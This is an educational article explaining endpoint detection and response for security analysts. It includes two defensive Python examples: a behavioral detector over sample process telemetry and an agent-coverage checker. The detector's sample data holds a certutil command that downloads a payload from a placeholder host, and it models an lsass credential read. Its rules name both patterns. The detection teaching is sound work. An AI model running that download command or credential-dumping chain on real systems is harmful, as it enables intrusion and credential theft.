
What Is EDR? Endpoint Detection and Response

Endpoint detection and response (EDR) is a security technology that continuously records activity on endpoints (laptops, servers, and workstations), analyzes it for signs of malicious behavior, and gives analysts the tools to investigate and respond.

An analyst gets an alert at 2 a.m. Nothing is obviously wrong. The antivirus is quiet, no known-bad file, no flagged signature. But the EDR console shows a process tree that should not exist: Microsoft Word spawned PowerShell, PowerShell launched certutil to download a file, and a few seconds later something tried to read the memory of lsass.exe, the process that holds Windows credentials. Every one of those programs is legitimate. The sequence is not. The analyst clicks one button, isolates the machine from the network, and the intrusion stops there, at one workstation, before it became a domain-wide ransomware event.

Traditional antivirus would have seen nothing, because nothing in that chain is a known-bad file. EDR caught it because it was not looking for files. It was watching behavior, recording every action on the endpoint, and it recognized the shape of an attack.

This guide covers what EDR is and where it came from, why signature antivirus stopped being enough, how EDR works stage by stage, what it actually collects and what it can do in response, how it compares to EPP, MDR, and XDR, where it fits in a SOC, and its real limitations. It is written for blue teamers who live in the EDR console: SOC analysts, incident responders, and threat hunters.

What is EDR?

Endpoint detection and response (EDR) is a security technology that continuously records activity on endpoints, laptops, servers, and workstations, analyzes it for signs of malicious behavior, and gives analysts the tools to investigate and respond. The endpoint is where most attacks ultimately execute: where the malicious code runs, where credentials are stolen, where ransomware encrypts. EDR is the camera and the controls in that room.

The term comes from Gartner analyst Anton Chuvakin, who coined "endpoint threat detection and response" in 2013 to name a new category of tools focused on detecting and investigating suspicious activity on hosts, as opposed to just blocking known malware. The name shortened to EDR, and the category became standard.

The shift it represents is from prevention alone to detection and response. Prevention assumes you can stop every threat at the door. EDR assumes some will get through, and makes sure that when they do, you can see what they did and stop them fast. That assumption, that breaches are inevitable and visibility is the real defense, is why EDR became foundational to modern security operations.

Why signature antivirus is not enough

Traditional antivirus, the original endpoint protection, works by signatures: it compares files against a database of known-bad hashes and patterns. If the file matches, it blocks it. This is fast and effective against known, file-based malware, and it is still worth having. But it has two structural blind spots.

It only knows what it has seen before. A brand-new malware variant, or one repacked to change its hash, has no signature yet. Signature antivirus cannot catch what is not in its database.

It looks at files, not behavior. Modern intrusions increasingly use no malicious file at all. "Living off the land" attacks abuse legitimate, already-installed tools (PowerShell, certutil, wmic, psexec) to do their work. Every binary is trusted and signed by Microsoft. To a file scanner, nothing is wrong. The attack lives in the sequence of actions, not in any single file.

EDR closes both gaps by changing what it watches. Instead of asking "is this file known to be bad," it asks "is this behavior suspicious." A Word document spawning PowerShell that reaches into credential memory is a malicious pattern regardless of which files are involved, and that is exactly what EDR is built to see.

How EDR works

[Diagram: EDR behavioral detection chain. Every process is legitimate; the sequence is not. What a file scanner sees as four trusted programs, EDR sees as one malicious chain.]

  • Parent: winword.exe. The user opens a document; the process is signed and trusted.
  • Suspicious child: powershell.exe. Word spawns PowerShell; Office apps rarely do this.
  • Download: certutil.exe. PowerShell calls certutil to pull a payload from the web.
  • Credential theft: lsass.exe access. The memory of lsass is read to steal credentials (MITRE ATT&CK T1003).
  • Response, host isolation: one click cuts the endpoint off the network. The intrusion stops at one workstation, before it becomes a domain-wide event.

EDR runs as a lightweight agent on every endpoint, streaming telemetry to a central platform that analyzes it and presents it to analysts. The work happens in four continuous stages.

| Stage | What happens |
| --- | --- |
| Collect | The agent records endpoint activity in detail: process launches, file changes, registry edits, network connections, and user actions |
| Detect | The platform analyzes that telemetry for malicious behavior, using behavioral analytics, threat intelligence, and detection rules mapped to known attacker techniques |
| Investigate | Analysts get the full context: a process tree, a timeline, and the chain of events, so they can confirm what happened and how far it went |
| Respond | Analysts (or automated rules) contain and remediate: isolate the host, kill a process, quarantine a file, or roll back changes |

Collection is the foundation. The agent continuously logs what happens on the device and retains it, which means even an attack that is not detected in the moment leaves a record an analyst can reconstruct later. This recorded history is what separates EDR from a simple alarm.

This matters because attackers are not always caught in the moment they strike. Mandiant's M-Trends 2026 report puts the global median dwell time, the gap between an intrusion and its detection, at 14 days. When detection comes late, that recorded history is what lets an analyst reconstruct those two weeks: what the attacker touched, which accounts they used, what they took, and whether they are still inside. Without the recording, a late-discovered breach is a mystery.

Detection is where it earns its keep. Rather than matching signatures, it looks for behavior: anomalies against a baseline, sequences that match known adversary techniques, and indicators pulled from threat intelligence. Many of its detections are mapped to MITRE ATT&CK, the framework that catalogs how attackers actually operate, so an alert says not just "suspicious" but "this looks like credential dumping."

Investigation turns an alert into understanding. Because the agent recorded everything, the analyst can pull up the full process tree, see what the suspicious process did before and after, trace it back to its origin, and decide whether it is a real attack or a false positive. This context is what makes triage possible at speed.

Response is the "R" that antivirus never had. From the console, an analyst can isolate the endpoint so it can talk only to the EDR platform, kill the malicious process, delete or quarantine files, and on many platforms roll the machine back to a clean state. The most important of these is host isolation, because it stops an active intrusion from spreading while the investigation continues.

What EDR collects

Its power comes from the breadth of what it records. A typical agent captures:

  • Process activity. Every process that launches, its command line, and its parent, which is how the Word-spawns-PowerShell chain becomes visible.
  • File activity. Files created, modified, deleted, or executed, the trail ransomware and droppers leave.
  • Registry and configuration changes. The persistence mechanisms attackers use to survive a reboot.
  • Network connections. Where the endpoint is talking, which surfaces command-and-control beaconing and data movement.
  • User and logon activity. Who logged in, when, and from where, which exposes account misuse and lateral movement.
  • Memory activity. What is running in memory, where fileless attacks and credential theft live.

Together these become the indicators of compromise (IOCs) and behavioral signals that detection runs on, and the evidence an investigation is built from.

A concrete example makes the value clear: when a process reads the memory of lsass.exe to steal credentials, the agent records the access, recognizes it as the credential-dumping technique cataloged in MITRE ATT&CK as T1003, and raises an alert tied to that specific technique. The same telemetry that fires the alert later proves exactly which account was exposed and when, which is the difference between guessing at the impact and knowing it.
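Here is how the collect, detect, investigate and respond stages, and the process and memory telemetry listed above, come together in code. This is an added example, not code from this glossary entry or from any EDR product. It runs three behavioral rules over a constructed set of process-creation and process-access events modelled on the Word-to-PowerShell-to-certutil-to-lsass chain, then walks parent links to rebuild the lineage of each alert and picks a response. The event schema, field names, the lsass allow-list and the isolate policy are assumptions made for the example; T1003 is the ATT&CK ID the page cites, and T1059 and T1105 are the ATT&CK IDs for command-and-scripting-interpreter and ingress-tool-transfer activity.

```python
"""Behavioral detection and process-lineage reconstruction over EDR-style telemetry.

Added example; not code from the glossary entry or from any EDR product. The event
schema, field names, allow-list and isolate policy are assumptions for the example.
"""

# Constructed sample telemetry: the Word -> PowerShell -> certutil -> lsass chain from
# the article, plus one benign PowerShell launch (a backup job) that must not alert.
EVENTS = [
    {"ts": 1, "type": "process_create", "pid": 100, "ppid": 4,
     "image": "explorer.exe", "cmdline": "explorer.exe", "user": "CORP\\jdoe"},
    {"ts": 2, "type": "process_create", "pid": 200, "ppid": 100,
     "image": "winword.exe", "cmdline": 'winword.exe "invoice.docm"', "user": "CORP\\jdoe"},
    {"ts": 3, "type": "process_create", "pid": 300, "ppid": 200,
     "image": "powershell.exe", "cmdline": "powershell.exe -NoProfile -WindowStyle Hidden -File stage.ps1",
     "user": "CORP\\jdoe"},
    {"ts": 4, "type": "process_create", "pid": 400, "ppid": 300,
     "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.5/payload.txt payload.txt",
     "user": "CORP\\jdoe"},
    {"ts": 5, "type": "process_access", "pid": 300, "target_image": "lsass.exe",
     "access": "PROCESS_VM_READ", "user": "CORP\\jdoe"},
    {"ts": 6, "type": "process_create", "pid": 500, "ppid": 4,
     "image": "powershell.exe", "cmdline": "powershell.exe -File C:\\ops\\backup.ps1",
     "user": "CORP\\svc_backup"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Constructed allow-list of images expected to open lsass; a real one is tuned per environment.
LSASS_READERS_ALLOWED = {"csrss.exe", "wininit.exe", "services.exe"}


def index_processes(events):
    """Map pid -> process_create record; this index is the process tree."""
    return {e["pid"]: e for e in events if e["type"] == "process_create"}


def lineage(procs, pid):
    """Walk parent links from pid up to the oldest ancestor we have telemetry for, child first."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:  # 'seen' guards against pid reuse loops
        seen.add(pid)
        chain.append(procs[pid])
        pid = procs[pid]["ppid"]
    return chain


def detect(events):
    """Detect stage: three behavioral rules, each tagged with an ATT&CK technique ID."""
    procs = index_processes(events)
    alerts = []
    for e in events:
        if e["type"] == "process_create":
            parent = procs.get(e["ppid"])
            if parent and parent["image"] in OFFICE_APPS and e["image"] in SCRIPT_HOSTS:
                alerts.append({"ts": e["ts"], "pid": e["pid"], "technique": "T1059",
                               "title": f"{parent['image']} spawned {e['image']}"})
            cmd = e["cmdline"].lower()
            if e["image"] == "certutil.exe" and "urlcache" in cmd and "http" in cmd:
                alerts.append({"ts": e["ts"], "pid": e["pid"], "technique": "T1105",
                               "title": "certutil used to download from the web"})
        elif e["type"] == "process_access" and e["target_image"] == "lsass.exe":
            source = procs.get(e["pid"], {}).get("image", "<unknown>")
            if source not in LSASS_READERS_ALLOWED:
                alerts.append({"ts": e["ts"], "pid": e["pid"], "technique": "T1003",
                               "title": f"{source} read lsass.exe memory"})
    return alerts


def triage(events):
    """Investigate and respond: group alerts by lineage root and decide an action per root.

    The policy is deliberately simple for the example: a credential-access alert (T1003)
    in a chain that passes through an Office app gets 'isolate_host'; anything else is
    left for an analyst to investigate.
    """
    procs = index_processes(events)
    incidents = {}
    for a in detect(events):
        chain = lineage(procs, a["pid"])
        root = chain[-1]["pid"] if chain else a["pid"]
        inc = incidents.setdefault(root, {"root": root, "chain": [], "techniques": [],
                                          "action": "investigate"})
        if len(chain) > len(inc["chain"]):
            inc["chain"] = [p["image"] for p in chain]  # keep the longest branch seen
        inc["techniques"].append(a["technique"])
    for inc in incidents.values():
        if "T1003" in inc["techniques"] and any(i in OFFICE_APPS for i in inc["chain"]):
            inc["action"] = "isolate_host"
    return incidents


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(f"t={a['ts']} pid={a['pid']} {a['technique']}: {a['title']}")
    for inc in triage(EVENTS).values():
        print(" -> ".join(reversed(inc["chain"])), "|", inc["techniques"], "|", inc["action"])
```

The benign backup job launches PowerShell too, but its parent is not an Office application, so no rule fires; that distinction between an identical image with a different parent is the whole point of recording the process tree rather than scanning files.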

EDR vs EPP vs MDR vs XDR

The endpoint security market is full of three-letter acronyms that overlap. Here is how they actually relate.

| Term | What it is | Scope |
| --- | --- | --- |
| EPP (Endpoint Protection Platform) | Prevention: antivirus, anti-malware, firewall. Blocks known threats at the endpoint | Endpoint, prevention |
| EDR (Endpoint Detection and Response) | Detection, investigation, and response on the endpoint. Catches what prevention misses | Endpoint, detection + response |
| XDR (Extended Detection and Response) | EDR extended across network, cloud, email, and identity, correlating threats across all of them | Whole environment |
| MDR (Managed Detection and Response) | EDR or XDR run for you by an external SOC, 24/7 | A service, not a tool |

The relationships in plain terms:

  • EPP and EDR are complementary, not competing. EPP blocks the known threats so EDR analysts are not buried in noise; EDR catches the unknown and the behavioral. Most modern endpoint suites bundle both.
  • XDR is EDR widened. It takes the same detect-investigate-respond model and applies it across more than the endpoint, correlating an endpoint alert with a suspicious login or a network anomaly to see the whole attack. The trade is complexity and integration effort.
  • MDR is a staffing answer, not a technology. EDR is only as good as the people watching it, and MDR is buying that team: a provider runs detection and response on your behalf, around the clock. Organizations without a 24/7 SOC use it to get coverage they cannot staff.

Where EDR fits in the SOC

EDR is rarely an island. In a working security operation it is one feed among several, and its real value shows up in how it connects to the rest.

EDR alerts flow into a SIEM, where they are correlated with logs from the network, identity systems, and cloud, so an analyst sees the endpoint event in context rather than alone. When an alert is confirmed, EDR is the primary tool for incident response: it provides the timeline of what the attacker did and the controls to contain it. Its recorded telemetry is also the hunting ground for proactive threat hunting, where analysts search the endpoint history for the subtle attacks no alert fired on. And it is the natural enforcement point for automated response, killing a process or isolating a host the moment a high-confidence detection lands.

The constant across all of these is the analyst. EDR surfaces the process tree; a person decides whether it is an attacker or an administrator doing something unusual. The tool generates the signal. The skill is reading it.

The limitations of EDR

EDR is powerful, not magic, and a defender should know where it falls short.

  • It needs people. The tool generates alerts and context, but someone has to triage, investigate, and decide. An EDR with no one watching it is an expensive log collector. This is the gap MDR exists to fill.
  • Attackers target it. Mature adversaries attempt to disable, blind, or bypass the EDR agent before they act, using techniques such as loading a vulnerable signed driver to unload the sensor from the kernel. Tamper protection and monitoring of the agent's own health both matter.
  • Coverage has gaps. An agent has to be installed to see anything. Unmanaged devices, IoT, and systems that cannot run an agent are blind spots, which is part of why XDR and network monitoring exist.
  • Tuning is constant. Out of the box, EDR can be noisy, flagging legitimate administrative tools that happen to look like attacks. Reducing false positives without suppressing real detections is ongoing work, not a one-time setup.

None of these are reasons to skip EDR. They are reasons to staff and run it properly.
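Two of the limitations above, coverage gaps and attackers tampering with the agent, can be checked for routinely by reconciling the organization's asset inventory against what the EDR platform reports. The following is an added example, not code from this glossary entry or from any EDR vendor: it compares a constructed list of hosts that recently authenticated to the domain with a constructed list of agent heartbeats, and flags active hosts with no agent, agents that have gone silent while their host is still in use (the pattern a blinded or unloaded sensor leaves), and agents running without tamper protection. The field names, thresholds and the agentless allow-list are assumptions; in practice the asset list would come from the directory or CMDB and the agent list from the EDR platform's API.

```python
"""Reconcile an asset inventory against EDR agent health to find coverage gaps.

Added example; not code from the glossary entry or from any EDR vendor. Inventories,
field names and thresholds are constructed assumptions for the example.
"""
from datetime import datetime, timedelta, timezone

NOW = datetime(2025, 1, 15, 9, 0, tzinfo=timezone.utc)  # fixed clock so results are reproducible
STALE_AFTER = timedelta(hours=6)    # heartbeat gap after which an agent counts as silent
INACTIVE_AFTER = timedelta(days=30)  # hosts that have not logged on for this long are ignored

# Constructed asset inventory: each host's most recent domain logon.
ASSETS = [
    {"host": "ws-001", "last_logon": NOW - timedelta(minutes=10)},
    {"host": "ws-002", "last_logon": NOW - timedelta(minutes=30)},
    {"host": "srv-db1", "last_logon": NOW - timedelta(hours=1)},
    {"host": "ws-003", "last_logon": NOW - timedelta(days=40)},    # decommissioned, stale in AD
    {"host": "ws-004", "last_logon": NOW - timedelta(minutes=15)},  # active, never got an agent
    {"host": "printer-7", "last_logon": NOW - timedelta(hours=2)},  # cannot run an agent
]

# Constructed EDR agent inventory: last heartbeat and sensor state as reported per host.
AGENTS = [
    {"host": "ws-001", "last_seen": NOW - timedelta(minutes=5), "tamper_protection": True},
    {"host": "ws-002", "last_seen": NOW - timedelta(hours=9), "tamper_protection": True},  # silent, host still active
    {"host": "srv-db1", "last_seen": NOW - timedelta(minutes=2), "tamper_protection": False},
]

# Known agentless devices, accepted as blind spots covered by network monitoring instead.
NO_AGENT_EXPECTED = {"printer-7"}


def coverage_report(assets, agents, now=NOW, stale_after=STALE_AFTER, inactive_after=INACTIVE_AFTER):
    """Classify every active host as missing an agent, silent, unprotected, or healthy."""
    agent_by_host = {a["host"]: a for a in agents}
    report = {"missing": [], "stale": [], "tamper_off": [], "healthy": []}
    for asset in assets:
        host = asset["host"]
        if now - asset["last_logon"] > inactive_after:
            continue  # nobody uses this host any more; not a coverage gap worth chasing
        agent = agent_by_host.get(host)
        if agent is None:
            if host not in NO_AGENT_EXPECTED:
                report["missing"].append(host)   # active host with no sensor at all
            continue
        if now - agent["last_seen"] > stale_after:
            report["stale"].append(host)         # host is alive but the sensor stopped talking
        elif not agent["tamper_protection"]:
            report["tamper_off"].append(host)    # sensor present but can be unloaded locally
        else:
            report["healthy"].append(host)
    return report


if __name__ == "__main__":
    for category, hosts in coverage_report(ASSETS, AGENTS).items():
        print(f"{category:10s} {', '.join(hosts) or '-'}")
```

The stale bucket is the one to treat as a potential security event rather than an IT ticket: a host that is still authenticating but whose sensor has stopped reporting is exactly what an unloaded or blinded agent looks like from the console.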

Getting started with EDR

If you are building the skill, the work is in the telemetry.

  1. Learn the process tree. Understand parent-child process relationships and what normal looks like, so an abnormal chain like Office spawning a script interpreter jumps out.
  2. Map detections to ATT&CK. Learn the common attacker techniques, credential dumping, persistence, lateral movement, so an EDR alert means something to you.
  3. Investigate a real detection. Take an alert and work it end to end: what fired, what the process did, where it came from, whether it is real.
  4. Practice the response decision. Know when to isolate, when to kill, and when to keep watching to learn more.

The bottom line

EDR is the shift from blocking known threats to recording everything and catching attacks by their behavior. It watches every process, file, and connection on the endpoint, recognizes the patterns of an intrusion that signature antivirus cannot see, and gives an analyst the context to investigate and the controls to contain, the host isolation that turns a breach into a contained incident.

It is not a replacement for prevention, and it is not autonomous: EPP still blocks the known, XDR widens the view, MDR supplies the staff, and a human still has to read the process tree and make the call. The constraint, as always, is the analyst who can tell an attacker from an administrator. 

Frequently asked questions

What is EDR in simple terms?

EDR (endpoint detection and response) is software that continuously records what happens on computers and servers, watches that activity for signs of an attack, and lets security teams investigate and shut threats down. Think of it as a security camera and an emergency stop for every endpoint, catching the threats that antivirus misses.

What is the difference between EDR and antivirus?

Antivirus blocks known malware by matching files against a database of signatures. EDR watches behavior instead, so it can catch new, unknown, and fileless attacks that use legitimate tools and leave no recognizable file. Antivirus prevents the known; EDR detects and responds to the unknown. They work best together.

What is the difference between EDR and XDR?

EDR focuses on the endpoint: laptops, servers, and workstations. XDR extends the same detect-investigate-respond model across more layers, including network, email, cloud, and identity, and correlates signals between them. XDR gives a broader view at the cost of more integration; EDR is more focused and is often the core that XDR is built on.

What is the difference between EDR and MDR?

EDR is a technology you deploy and operate. MDR (managed detection and response) is that capability delivered as a service: an external team runs the detection and response for you, 24/7. Organizations that lack the staff to watch EDR around the clock use MDR to get that coverage.

Can EDR stop ransomware?

EDR can detect and stop many ransomware attacks before they spread, by recognizing the behaviors that precede encryption (credential theft, lateral movement, mass file changes) and isolating the host. It is one of the most effective controls against ransomware, but only when someone acts on its alerts or automated response is configured.

How do I start a career working with EDR?

Learn how processes work on Windows and Linux and what a normal process tree looks like, then study common attacker techniques through MITRE ATT&CK. Practice investigating real endpoint detections in hands-on labs, tracing an alert from the first suspicious process to the full attack chain, to build the triage skills SOC roles test for.
